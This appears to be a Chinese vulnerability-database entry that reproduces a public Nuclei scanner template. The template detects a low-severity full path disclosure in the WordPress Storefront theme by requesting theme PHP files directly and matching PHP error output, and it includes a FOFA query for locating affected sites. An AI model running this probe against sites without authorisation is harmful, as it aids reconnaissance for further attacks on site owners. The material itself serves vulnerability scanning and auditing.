漏洞描述
The Storefront theme for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
wordpress-storefront-fpd: WordPress Storefront Theme - Full Path Disclosure
PoC代码[已公开]
id: wordpress-storefront-fpd
info:
name: WordPress Storefront Theme - Full Path Disclosure
author: pussycat0x
severity: low
description: |
The Storefront theme for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
reference:
- https://wordpress.org/themes/storefront/
- https://woocommerce.com/products/storefront/
metadata:
max-request: 3
vendor: wordpress
product: storefront
fofa-query: body="/wp-content/themes/storefront/"
tags: wordpress,wp,wp-theme,fpd,disclosure,storefront,woocommerce
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/storefront/functions.php"
- "{{BaseURL}}/wp-content/themes/storefront/header.php"
- "{{BaseURL}}/wp-content/themes/storefront/footer.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
- 'status_code == 200 || status_code == 500'
- 'contains(body, "/storefront")'
condition: and
# digest: 4a0a004730450220075c803ce60c45c3daba428577533b103b851dfaa85dda71ab204040233f798d022100bcf7906010fb0780ff2ed5422aa5421d7c793a924391d4c521c75f97f59e6908:922c64590222798bb761d5b6d8e72950